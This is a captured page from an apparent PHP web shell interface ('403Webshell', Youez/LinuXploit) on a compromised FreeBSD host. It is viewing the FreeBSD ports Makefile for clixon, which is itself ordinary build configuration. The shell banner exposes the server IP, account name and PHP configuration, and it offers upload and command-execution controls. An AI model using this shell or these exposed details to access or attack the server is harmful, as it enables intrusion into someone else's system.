403Webshell
Server IP : 82.208.35.60  /  Your IP : 216.73.216.89
Web Server : Apache/2.4.55 (FreeBSD) OpenSSL/1.1.1q-freebsd PHP/7.3.31
System : FreeBSD server7.d2m.cz 12.4-RELEASE-p9 FreeBSD 12.4-RELEASE-p9 GENERIC amd64
User : studiokobylisy_cz ( 1008)
PHP Version : 7.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/ports/devel/clixon/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/ports/devel/clixon/Makefile
PORTNAME=	clixon
PORTVERSION=	5.8.0
CATEGORIES=	devel

MAINTAINER=	dcornejo@netgate.com
COMMENT=	YANG-based toolchain including CLI, NETCONF and RESTCONF interfaces
WWW=		https://www.clicon.org/

LICENSE=	APACHE20
LICENSE_FILE=	${WRKSRC}/LICENSE.md

#LIB_DEPENDS=	libfcgi.so:www/fcgi
BUILD_DEPENDS=	cligen>=5.6.0:devel/cligen \
		nghttp2>=0:www/nghttp2
RUN_DEPENDS=	cligen>=5.6.0:devel/cligen \
		nghttp2>=0:www/nghttp2

USES=		bison compiler:c11 gmake

USE_GITHUB=	yes
GH_ACCOUNT=	clicon

USE_LDCONFIG=	yes

GNU_CONFIGURE=	yes
CONFIGURE_ARGS=	--sysconfdir=${ETCDIR} \
		--with-cligen=${LOCALBASE}
CONFIGURE_ENV=	YACC="bison -y"
MAKE_ARGS=	wwwdir=${PREFIX}/sbin \
		wwwuser=${WWWOWN}

SUB_FILES=	pkg-message

USERS=		clixon
GROUPS=		clixon

PLIST_SUB=	LIBMAJORVERSION=${PORTVERSION:R:R} \
		LIBVERSION=${PORTVERSION:R}

OPTIONS_DEFAULT=		NATIVE
OPTIONS_SINGLE=			RESTCONF
OPTIONS_SINGLE_RESTCONF=	NATIVE FCGI OFF
OPTIONS_SUB=	yes

FCGI_DESC=	FCGI interface for stand-alone web rev-proxy (eg nginx)
NATIVE_DESC=	Use embedded web server
OFF_DESC=	Disable restconf

FCGI_LIB_DEPENDS=	libfcgi.so:www/fcgi
FCGI_CONFIGURE_ON=	--with-restconf=fcgi
NATIVE_BUILD_DEPENDS=	nghttp2>=0:www/nghttp2
NATIVE_RUN_DEPENDS=	nghttp2>=0:www/nghttp2
NATIVE_CONFIGURE_ON=	--with-restconf=native
OFF_CONFIGURE_ON=	--without-restconf

.include <bsd.port.mk>

Youez - 2016 - github.com/yon3zu
LinuXploit